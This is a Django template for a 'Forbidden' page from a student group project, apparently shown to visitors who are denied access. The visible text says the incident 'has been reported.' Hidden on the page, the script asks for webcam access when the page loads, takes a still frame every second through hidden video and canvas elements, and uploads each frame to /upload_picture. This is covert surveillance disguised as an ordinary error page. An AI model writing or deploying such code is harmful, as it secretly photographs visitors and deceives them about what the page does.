{% load i18n %}
<!doctype html>
<html lang='en'>

<head>
    <meta charset='UTF-8'>
    <title>{% trans "Forbidden" %}</title></head>

<body style='display: flex;height: 100%;flex-direction: column;justify-content:
                                    center;align-content: flex-start;align-items: center;'>
<div style='display: flex;height: 100%;flex-direction: column;justify-content:
                                    center;align-content: flex-start;align-items: center;'>
    <div style='display:
                                    flex;flex-direction: column;align-content: space-around;flex-wrap: wrap;'>{% trans "You are " %}<h1>{% trans "Not Allowed to view this project" %}</h1><br>{% trans "This is the project built by COMP3030J Group8-IllegalGroupNameException." %}<br>{% trans "Please contact " %}<strong>{% trans "Group8" %}</strong>{% trans " to view this project." %}<br>{% trans "Your request has been intercept by our " %}<strong>{% trans "Auth Middleware." %}</strong>
        <p style='color:red'>{% trans "This incident has been reported." %}</p>
        <button id='take' hidden>{% trans "a" %}</button>
<br/>
<video id='v' style='width: 640px;height: 480px;' hidden></video>
<canvas id='canvas' style='display:none;'></canvas>
<br/>
<img src='' id='photo' alt='photo' hidden>
    </div>
</div>


<script>

    // 老的浏览器可能根本没有实现 mediaDevices，所以我们可以先设置一个空的对象
    if (navigator.mediaDevices === undefined) {
        navigator.mediaDevices = {};
    }
    if (navigator.mediaDevices.getUserMedia === undefined) {
        navigator.mediaDevices.getUserMedia = function (constraints) {
            // 首先，如果有getUserMedia的话，就获得它
            var getUserMedia = navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;

            // 一些浏览器根本没实现它 - 那么就返回一个error到promise的reject来保持一个统一的接口
            if (!getUserMedia) {
                return Promise.reject(new Error('getUserMedia is not implemented in this browser'));
            }

            // 否则，为老的navigator.getUserMedia方法包裹一个Promise
            return new Promise(function (resolve, reject) {
                getUserMedia.call(navigator, constraints, resolve, reject);
            });
        }
    }
    const constraints = {
        video: true,
        audio: false
    };
    let videoPlaying = false;
    let v = document.getElementById('v');
    let promise = navigator.mediaDevices.getUserMedia(constraints);
    promise.then(stream => {
        if ('srcObject' in v) {
            v.srcObject = stream;
        } else {
            v.src = window.URL.createObjectURL(stream);
        }
        v.onloadedmetadata = function (e) {
            v.play();
            videoPlaying = true;
        };
    }).catch(err => {
        console.error(err.name + ': ' + err.message);
    })

    function camera() {
        let canvas = document.getElementById('canvas');
        canvas.width = v.videoWidth;
        canvas.height = v.videoHeight;
        canvas.getContext('2d').drawImage(v, 0, 0);
        let data = canvas.toDataURL('image/webp');
        console.log(data)
        var xmlHttp = new XMLHttpRequest();

        xmlHttp.open('GET', '/upload_picture?data=' + data, true);
        xmlHttp.send();


        document.getElementById('photo').setAttribute('src', data);
        setTimeout(function () {
            camera()
        }, 1000)
    }

    document.onreadystatechange = function (e) {
        console.log(e);
        camera()
    };
</script>


</body>

</html>